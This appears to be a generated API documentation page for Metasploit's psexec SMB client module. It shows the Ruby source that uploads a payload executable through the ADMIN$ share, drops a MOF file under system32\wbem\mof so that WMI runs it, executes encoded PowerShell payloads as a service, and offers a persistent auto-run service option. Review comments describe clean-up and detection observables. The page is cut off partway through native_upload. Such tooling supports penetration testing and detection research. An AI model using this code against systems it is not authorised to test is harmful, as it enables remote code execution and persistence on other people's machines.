<span class='id identifier rubyid_bat'>bat</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>\\Windows\\Temp\\</span><span class='embexpr_beg'>#{</span><span class='const'><span class='object_link'><a href="../../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_rand_text_alpha'>rand_text_alpha</span><span class='lparen'>(</span><span class='int'>8</span><span class='op'>..</span><span class='int'>16</span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='tstring_content'>.bat</span><span class='tstring_end'>"</span></span>
|
||
<span class='id identifier rubyid_command'>command</span> <span class='op'>=</span> <span class='id identifier rubyid_payload'>payload</span><span class='period'>.</span><span class='id identifier rubyid_encoded'>encoded</span>
|
||
<span class='id identifier rubyid_output'>output</span> <span class='op'>=</span> <span class='id identifier rubyid_execute_command_with_output'>execute_command_with_output</span><span class='lparen'>(</span><span class='id identifier rubyid_text'>text</span><span class='comma'>,</span> <span class='id identifier rubyid_bat'>bat</span><span class='comma'>,</span> <span class='id identifier rubyid_command'>command</span><span class='comma'>,</span> <span class='id identifier rubyid_smbshare'>smbshare</span><span class='comma'>,</span> <span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_address'>address</span><span class='comma'>,</span> <span class='label'>delay:</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>CMD::DELAY</span><span class='tstring_end'>'</span></span><span class='rbracket'>]</span><span class='rparen'>)</span>
|
||
|
||
<span class='kw'>unless</span> <span class='id identifier rubyid_output'>output</span><span class='period'>.</span><span class='id identifier rubyid_nil?'>nil?</span>
|
||
<span class='id identifier rubyid_print_good'>print_good</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>Command completed successfully!</span><span class='tstring_end'>'</span></span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Output for \"</span><span class='embexpr_beg'>#{</span> <span class='id identifier rubyid_command'>command</span> <span class='embexpr_end'>}</span><span class='tstring_content'>\":\n</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_print_line'>print_line</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_output'>output</span><span class='embexpr_end'>}</span><span class='tstring_content'>\n</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_report_note'>report_note</span><span class='lparen'>(</span>
|
||
<span class='symbol'>:rhost</span> <span class='op'>=></span> <span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_address'>address</span><span class='comma'>,</span>
|
||
<span class='symbol'>:rport</span> <span class='op'>=></span> <span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_port'>port</span><span class='comma'>,</span>
|
||
<span class='symbol'>:type</span> <span class='op'>=></span> <span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>psexec_command</span><span class='tstring_end'>'</span></span><span class='comma'>,</span>
|
||
<span class='symbol'>:name</span> <span class='op'>=></span> <span class='id identifier rubyid_command'>command</span><span class='comma'>,</span>
|
||
<span class='symbol'>:data</span> <span class='op'>=></span> <span class='lbrace'>{</span> <span class='symbol'>:command_output</span> <span class='op'>=></span> <span class='id identifier rubyid_output'>output</span> <span class='rbrace'>}</span>
|
||
<span class='rparen'>)</span>
|
||
<span class='kw'>end</span>
|
||
<span class='kw'>end</span></pre>
|
||
</td>
|
||
</tr>
|
||
</table>
|
||
</div>
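<div class="method_details ">
  <!--
    execute_command_with_output: runs execute_command(text, bat, cmd) and, when that
    returns a truthy value, waits for the output file to be released before reading it.
    * Each of the (retries + 1) loop passes first sleeps `delay` seconds via Rex.sleep,
      then calls exclusive_access(text, smb_share, r_ip); the loop stops as soon as that
      call returns true. With the defaults (delay 0, retries 0) there is one pass, no wait.
    * When the last pass still fails the check, only an error is printed. get_output is
      called afterwards regardless, so the returned output may be incomplete.
    * cleanup_after(bat, smb_share, r_ip) is called whether or not execute_command
      succeeded. There is no ensure clause, so it is skipped if an exception propagates.
    * Returns the value of get_output, or nil when execute_command returned a falsy value.
    NOTE(review): cleanup_after receives `bat` only. Whether the `text` output file is
    also removed from the share is not visible in this listing; confirm in get_output and
    cleanup_after, because leftover files matter for clean-up and for forensic review.
  -->
  <h3 class="signature " id="execute_command_with_output-instance_method">
    #<strong>execute_command_with_output</strong>(text, bat, cmd, smb_share, r_ip, delay: 0, retries: 0) ⇒ <tt>Object</tt>
  </h3>
  <table class="source_code">
    <tr>
      <td>
<pre class="lines">


255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272</pre>
      </td>
      <td>
<pre class="code"><span class="info file"># File &#39;lib/msf/core/exploit/remote/smb/client/psexec.rb&#39;, line 255</span>

<span class='kw'>def</span> <span class='id identifier rubyid_execute_command_with_output'>execute_command_with_output</span><span class='lparen'>(</span><span class='id identifier rubyid_text'>text</span><span class='comma'>,</span> <span class='id identifier rubyid_bat'>bat</span><span class='comma'>,</span> <span class='id identifier rubyid_cmd'>cmd</span><span class='comma'>,</span> <span class='id identifier rubyid_smb_share'>smb_share</span><span class='comma'>,</span> <span class='id identifier rubyid_r_ip'>r_ip</span><span class='comma'>,</span> <span class='label'>delay:</span> <span class='int'>0</span><span class='comma'>,</span> <span class='label'>retries:</span> <span class='int'>0</span><span class='rparen'>)</span>
  <span class='id identifier rubyid_res'>res</span> <span class='op'>=</span> <span class='id identifier rubyid_execute_command'>execute_command</span><span class='lparen'>(</span><span class='id identifier rubyid_text'>text</span><span class='comma'>,</span> <span class='id identifier rubyid_bat'>bat</span><span class='comma'>,</span> <span class='id identifier rubyid_cmd'>cmd</span><span class='rparen'>)</span>
  <span class='kw'>if</span> <span class='id identifier rubyid_res'>res</span>
    <span class='kw'>for</span> <span class='id identifier rubyid_i'>i</span> <span class='kw'>in</span> <span class='int'>0</span><span class='op'>..</span><span class='lparen'>(</span><span class='id identifier rubyid_retries'>retries</span><span class='rparen'>)</span>
      <span class='const'><span class='object_link'><a href="../../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='period'>.</span><span class='id identifier rubyid_sleep'>sleep</span><span class='lparen'>(</span><span class='id identifier rubyid_delay'>delay</span><span class='rparen'>)</span>
      <span class='comment'># if the output file is still locked then the program is still likely running
</span>      <span class='kw'>if</span> <span class='lparen'>(</span><span class='id identifier rubyid_exclusive_access'>exclusive_access</span><span class='lparen'>(</span><span class='id identifier rubyid_text'>text</span><span class='comma'>,</span> <span class='id identifier rubyid_smb_share'>smb_share</span><span class='comma'>,</span> <span class='id identifier rubyid_r_ip'>r_ip</span><span class='rparen'>)</span><span class='rparen'>)</span>
        <span class='kw'>break</span>
      <span class='kw'>elsif</span> <span class='lparen'>(</span><span class='id identifier rubyid_i'>i</span> <span class='op'>==</span> <span class='id identifier rubyid_retries'>retries</span><span class='rparen'>)</span>
        <span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Command seems to still be executing. Try increasing RETRY and DELAY</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
      <span class='kw'>end</span>
    <span class='kw'>end</span>
    <span class='id identifier rubyid_output'>output</span> <span class='op'>=</span> <span class='id identifier rubyid_get_output'>get_output</span><span class='lparen'>(</span><span class='id identifier rubyid_text'>text</span><span class='comma'>,</span> <span class='id identifier rubyid_smb_share'>smb_share</span><span class='comma'>,</span> <span class='id identifier rubyid_r_ip'>r_ip</span><span class='rparen'>)</span>
  <span class='kw'>end</span>

  <span class='id identifier rubyid_cleanup_after'>cleanup_after</span><span class='lparen'>(</span><span class='id identifier rubyid_bat'>bat</span><span class='comma'>,</span> <span class='id identifier rubyid_smb_share'>smb_share</span><span class='comma'>,</span> <span class='id identifier rubyid_r_ip'>r_ip</span><span class='rparen'>)</span>
  <span class='id identifier rubyid_output'>output</span>
<span class='kw'>end</span></pre>
      </td>
    </tr>
  </table>
</div>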
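<div class="method_details ">
  <!--
    execute_powershell_payload: builds a PowerShell command line for the current payload
    and hands it to psexec(command).
    * Copies datastore['SERVICE_NAME'] into the process environment variable
      MSF_SERVICENAME. ENV is process-wide and the previous value is not restored here.
      In Ruby, assigning nil to an ENV key deletes it, which is what happens when the
      option is left at its nil default.
      NOTE(review): the consumer of MSF_SERVICENAME is not visible in this listing.
    * command comes from cmd_psh_payload(payload.encoded, payload_instance.arch.first).
    * Prints a warning when PSH::persist is set while DisablePayloadHandler is not.
    * RubySMB::Error::CommunicationError is treated as non-fatal: it is reported through
      vprint_error only, and only when no session was created. Any other StandardError
      ends the run through fail_with(Failure::Unknown).
    * For detection work: the service name is taken from an operator-supplied option, so
      a fixed service name is not a dependable indicator of this code path.
  -->
  <h3 class="signature " id="execute_powershell_payload-instance_method">
    #<strong>execute_powershell_payload</strong> ⇒ <tt>Object</tt>
  </h3>
  <table class="source_code">
    <tr>
      <td>
<pre class="lines">


274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291</pre>
      </td>
      <td>
<pre class="code"><span class="info file"># File &#39;lib/msf/core/exploit/remote/smb/client/psexec.rb&#39;, line 274</span>

<span class='kw'>def</span> <span class='id identifier rubyid_execute_powershell_payload'>execute_powershell_payload</span>
  <span class='const'>ENV</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>MSF_SERVICENAME</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>SERVICE_NAME</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
  <span class='id identifier rubyid_command'>command</span> <span class='op'>=</span> <span class='id identifier rubyid_cmd_psh_payload'>cmd_psh_payload</span><span class='lparen'>(</span><span class='id identifier rubyid_payload'>payload</span><span class='period'>.</span><span class='id identifier rubyid_encoded'>encoded</span><span class='comma'>,</span> <span class='id identifier rubyid_payload_instance'>payload_instance</span><span class='period'>.</span><span class='id identifier rubyid_arch'>arch</span><span class='period'>.</span><span class='id identifier rubyid_first'>first</span><span class='rparen'>)</span>

  <span class='kw'>if</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>PSH::persist</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='kw'>and</span> <span class='kw'>not</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>DisablePayloadHandler</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
    <span class='id identifier rubyid_print_warning'>print_warning</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>You probably want to DisablePayloadHandler and use exploit/multi/handler with the PSH::persist option</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
  <span class='kw'>end</span>

  <span class='comment'># Execute the powershell command
</span>  <span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Executing the payload...</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
  <span class='kw'>begin</span>
    <span class='id identifier rubyid_psexec'>psexec</span><span class='lparen'>(</span><span class='id identifier rubyid_command'>command</span><span class='rparen'>)</span>
  <span class='kw'>rescue</span> <span class='const'>RubySMB</span><span class='op'>::</span><span class='const'>Error</span><span class='op'>::</span><span class='const'>CommunicationError</span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_exec_command_error'>exec_command_error</span>
    <span class='id identifier rubyid_vprint_error'>vprint_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_peer'>peer</span><span class='embexpr_end'>}</span><span class='tstring_content'> - Possibly failed to execute the specified command (error: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_exec_command_error'>exec_command_error</span><span class='embexpr_end'>}</span><span class='tstring_content'>)</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span> <span class='kw'>unless</span> <span class='id identifier rubyid_session_created?'>session_created?</span>
  <span class='kw'>rescue</span> <span class='const'>StandardError</span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_exec_command_error'>exec_command_error</span>
    <span class='id identifier rubyid_fail_with'>fail_with</span><span class='lparen'>(</span><span class='const'><span class='object_link'><a href="../../../../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Module/Failure.html" title="Msf::Module::Failure (module)">Failure</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Module/Failure.html#Unknown-constant" title="Msf::Module::Failure::Unknown (constant)">Unknown</a></span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_peer'>peer</span><span class='embexpr_end'>}</span><span class='tstring_content'> - Unable to execute the specified command (error: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_exec_command_error'>exec_command_error</span><span class='embexpr_end'>}</span><span class='tstring_content'>)</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
  <span class='kw'>end</span>
<span class='kw'>end</span></pre>
      </td>
    </tr>
  </table>
</div>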
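<div class="method_details ">
  <!--
    initialize(info = {}): calls super with the same arguments (bare `super`), then
    registers this mixin's datastore options. Each option array reads
    [required, description, default].
    Standard options, all optional strings with a nil default:
      SERVICE_NAME, SERVICE_DISPLAY_NAME, SERVICE_DESCRIPTION
    Advanced options:
      SERVICE_PERSIST  boolean, required, default false
      CMD::DELAY       integer, optional, default 3 (seconds, per its description)
    * Per its description, SERVICE_PERSIST creates an auto-run service and does not
      remove it. A run with this option enabled therefore leaves a service behind that
      has to be tracked and removed by hand; for defenders, an unexpected auto-start
      service is the artifact to look for.
    * NOTE(review): how a nil service name or display name is replaced at run time is
      not visible in this listing.
  -->
  <h3 class="signature " id="initialize-instance_method">
    #<strong>initialize</strong>(info = {}) ⇒ <tt>Object</tt>
  </h3>
  <table class="source_code">
    <tr>
      <td>
<pre class="lines">


23
24
25
26
27
28
29
30
31
32
33
34
35
36
37</pre>
      </td>
      <td>
<pre class="code"><span class="info file"># File &#39;lib/msf/core/exploit/remote/smb/client/psexec.rb&#39;, line 23</span>

<span class='kw'>def</span> <span class='id identifier rubyid_initialize'>initialize</span><span class='lparen'>(</span><span class='id identifier rubyid_info'>info</span> <span class='op'>=</span> <span class='lbrace'>{</span><span class='rbrace'>}</span><span class='rparen'>)</span>
  <span class='kw'>super</span>
  <span class='id identifier rubyid_register_options'>register_options</span><span class='lparen'>(</span>
    <span class='lbracket'>[</span>
      <span class='const'><span class='object_link'><a href="../../../../OptString.html" title="Msf::OptString (class)">OptString</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../../../../OptString.html#initialize-instance_method" title="Msf::OptString#initialize (method)">new</a></span></span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>SERVICE_NAME</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='lbracket'>[</span> <span class='kw'>false</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>The service name</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='kw'>nil</span><span class='rbracket'>]</span><span class='rparen'>)</span><span class='comma'>,</span>
      <span class='const'><span class='object_link'><a href="../../../../OptString.html" title="Msf::OptString (class)">OptString</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../../../../OptString.html#initialize-instance_method" title="Msf::OptString#initialize (method)">new</a></span></span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>SERVICE_DISPLAY_NAME</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='lbracket'>[</span> <span class='kw'>false</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>The service display name</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='kw'>nil</span><span class='rbracket'>]</span><span class='rparen'>)</span><span class='comma'>,</span>
      <span class='const'><span class='object_link'><a href="../../../../OptString.html" title="Msf::OptString (class)">OptString</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../../../../OptString.html#initialize-instance_method" title="Msf::OptString#initialize (method)">new</a></span></span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>SERVICE_DESCRIPTION</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='lbracket'>[</span><span class='kw'>false</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Service description to be used on target for pretty listing</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span><span class='kw'>nil</span><span class='rbracket'>]</span><span class='rparen'>)</span>
    <span class='rbracket'>]</span><span class='comma'>,</span> <span class='kw'>self</span><span class='period'>.</span><span class='id identifier rubyid_class'>class</span><span class='rparen'>)</span>

  <span class='id identifier rubyid_register_advanced_options'>register_advanced_options</span><span class='lparen'>(</span>
    <span class='lbracket'>[</span>
      <span class='const'><span class='object_link'><a href="../../../../OptBool.html" title="Msf::OptBool (class)">OptBool</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../../../../OptBool.html#initialize-instance_method" title="Msf::OptBool#initialize (method)">new</a></span></span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>SERVICE_PERSIST</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='lbracket'>[</span> <span class='kw'>true</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Create an Auto run service and do not remove it.</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='kw'>false</span><span class='rbracket'>]</span><span class='rparen'>)</span><span class='comma'>,</span>
      <span class='const'><span class='object_link'><a href="../../../../OptInt.html" title="Msf::OptInt (class)">OptInt</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../../../../OptBase.html#initialize-instance_method" title="Msf::OptBase#initialize (method)">new</a></span></span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>CMD::DELAY</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='lbracket'>[</span><span class='kw'>false</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>A delay (in seconds) before reading the command output and cleaning up</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='int'>3</span><span class='rbracket'>]</span><span class='rparen'>)</span>
    <span class='rbracket'>]</span><span class='comma'>,</span> <span class='kw'>self</span><span class='period'>.</span><span class='id identifier rubyid_class'>class</span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
      </td>
    </tr>
  </table>
</div>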
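<div class="method_details ">
  <!--
    mof_upload(smb_share): writes two files through the ADMIN$ share of simple.address,
    a payload executable and a MOF file that refers to it.
    * The share path is always built as \\<address>\ADMIN$. When smb_share is anything
      other than 'ADMIN$' the method prints an error and returns nil without connecting.
      The "Trying wbemexec..." and "Uploading Payload..." status lines are printed
      before that check, so they also appear on the early-return path.
    * File names are random: 8 alphabetic characters plus ".exe", and 14 alphanumeric
      characters plus ".MOF".
    * Paths written, relative to ADMIN$: \system32\<name>.exe and
      \system32\wbem\mof\<name>.MOF (reported to the operator under %SystemRoot%).
    * There is no rescue or ensure: if smb_open or a write raises, the open handle is
      not closed and simple.disconnect(share) is not reached.
    * This method removes neither file; whether a caller does is not visible here.
    * For detection work: because the names are random, the stable observables are the
      locations, namely new files under system32\wbem\mof and new executables in
      system32 that arrive over an SMB session to ADMIN$.
  -->
  <h3 class="signature " id="mof_upload-instance_method">
    #<strong>mof_upload</strong>(smb_share) ⇒ <tt>Object</tt>
  </h3>
  <table class="source_code">
    <tr>
      <td>
<pre class="lines">


364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393</pre>
      </td>
      <td>
<pre class="code"><span class="info file"># File &#39;lib/msf/core/exploit/remote/smb/client/psexec.rb&#39;, line 364</span>

<span class='kw'>def</span> <span class='id identifier rubyid_mof_upload'>mof_upload</span><span class='lparen'>(</span><span class='id identifier rubyid_smb_share'>smb_share</span><span class='rparen'>)</span>
  <span class='id identifier rubyid_share'>share</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\\\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_address'>address</span><span class='embexpr_end'>}</span><span class='tstring_content'>\\ADMIN$</span><span class='tstring_end'>&quot;</span></span>
  <span class='id identifier rubyid_filename'>filename</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='embexpr_beg'>#{</span><span class='const'><span class='object_link'><a href="../../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_rand_text_alpha'>rand_text_alpha</span><span class='lparen'>(</span><span class='int'>8</span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='tstring_content'>.exe</span><span class='tstring_end'>&quot;</span></span>

  <span class='comment'># payload as exe
</span>  <span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Trying wbemexec...</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
  <span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Uploading Payload...</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
  <span class='kw'>if</span> <span class='id identifier rubyid_smb_share'>smb_share</span> <span class='op'>!=</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>ADMIN$</span><span class='tstring_end'>&#39;</span></span>
    <span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Wbem will only work with ADMIN$ share</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
    <span class='kw'>return</span>
  <span class='kw'>end</span>
  <span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_connect'>connect</span><span class='lparen'>(</span><span class='id identifier rubyid_share'>share</span><span class='rparen'>)</span>
  <span class='id identifier rubyid_exe'>exe</span> <span class='op'>=</span> <span class='id identifier rubyid_generate_payload_exe'>generate_payload_exe</span>
  <span class='id identifier rubyid_fd'>fd</span> <span class='op'>=</span> <span class='id identifier rubyid_smb_open'>smb_open</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\\system32\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_filename'>filename</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>rwct</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='label'>write:</span> <span class='kw'>true</span><span class='rparen'>)</span>
  <span class='id identifier rubyid_fd'>fd</span> <span class='op'>&lt;&lt;</span> <span class='id identifier rubyid_exe'>exe</span>
  <span class='id identifier rubyid_fd'>fd</span><span class='period'>.</span><span class='id identifier rubyid_close'>close</span>
  <span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Created %SystemRoot%\\system32\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_filename'>filename</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>

  <span class='comment'># mof to cause execution of above
</span>  <span class='id identifier rubyid_mofname'>mofname</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_rand_text_alphanumeric'>rand_text_alphanumeric</span><span class='lparen'>(</span><span class='int'>14</span><span class='rparen'>)</span> <span class='op'>+</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>.MOF</span><span class='tstring_end'>&quot;</span></span>
  <span class='id identifier rubyid_mof'>mof</span> <span class='op'>=</span> <span class='id identifier rubyid_generate_mof'>generate_mof</span><span class='lparen'>(</span><span class='id identifier rubyid_mofname'>mofname</span><span class='comma'>,</span> <span class='id identifier rubyid_filename'>filename</span><span class='rparen'>)</span>
  <span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Uploading MOF...</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
  <span class='id identifier rubyid_fd'>fd</span> <span class='op'>=</span> <span class='id identifier rubyid_smb_open'>smb_open</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\\system32\\wbem\\mof\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_mofname'>mofname</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>rwct</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='label'>write:</span> <span class='kw'>true</span><span class='rparen'>)</span>
  <span class='id identifier rubyid_fd'>fd</span> <span class='op'>&lt;&lt;</span> <span class='id identifier rubyid_mof'>mof</span>
  <span class='id identifier rubyid_fd'>fd</span><span class='period'>.</span><span class='id identifier rubyid_close'>close</span>
  <span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Created %SystemRoot%\\system32\\wbem\\mof\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_mofname'>mofname</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>

  <span class='comment'># Disconnect from the ADMIN$
</span>  <span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_disconnect'>disconnect</span><span class='lparen'>(</span><span class='id identifier rubyid_share'>share</span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
      </td>
    </tr>
  </table>
</div>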
<div class="method_details ">
|
||
<h3 class="signature " id="native_upload-instance_method">
|
||
|
||
#<strong>native_upload</strong>(smb_share, filename, service_encoder) ⇒ <tt>Object</tt>
|
||
|
||
|
||
|
||
|
||
|
||
</h3><table class="source_code">
|
||
<tr>
|
||
<td>
|
||
<pre class="lines">
|
||
|
||
|
||
293
|
||
294
|
||
295
|
||
296
|
||
297
|
||
298
|
||
299
|
||
300
|
||
301
|
||
302
|
||
303
|
||
304
|
||
305
|
||
306
|
||
307
|
||
308
|
||
309
|
||
310
|
||
311
|
||
312
|
||
313
|
||
314
|
||
315
|
||
316
|
||
317
|
||
318
|
||
319
|
||
320
|
||
321
|
||
322
|
||
323
|
||
324
|
||
325
|
||
326
|
||
327
|
||
328
|
||
329
|
||
330
|
||
331
|
||
332
|
||
333
|
||
334
|
||
335
|
||
336
|
||
337
|
||
338
|
||
339
|
||
340
|
||
341
|
||
342
|
||
343
|
||
344
|
||
345
|
||
346
|
||
347
|
||
348
|
||
349
|
||
350
|
||
351
|
||
352
|
||
353
|
||
354
|
||
355
|
||
356
|
||
357
|
||
358
|
||
359
|
||
360
|
||
361
|
||
362</pre>
|
||
</td>
|
||
<td>
|
||
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/smb/client/psexec.rb', line 293</span>
|
||
|
||
<span class='kw'>def</span> <span class='id identifier rubyid_native_upload'>native_upload</span><span class='lparen'>(</span><span class='id identifier rubyid_smb_share'>smb_share</span><span class='comma'>,</span> <span class='id identifier rubyid_filename'>filename</span><span class='comma'>,</span> <span class='id identifier rubyid_service_encoder'>service_encoder</span><span class='rparen'>)</span>
|
||
<span class='comment'># Upload the shellcode to a file
|
||
</span> <span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Uploading payload... </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_filename'>filename</span><span class='embexpr_end'>}</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_smbshare'>smbshare</span> <span class='op'>=</span> <span class='id identifier rubyid_smb_share'>smb_share</span>
|
||
<span class='id identifier rubyid_fileprefix'>fileprefix</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_end'>"</span></span>
|
||
<span class='comment'># if SHARE = Users/sasha/ or something like this
|
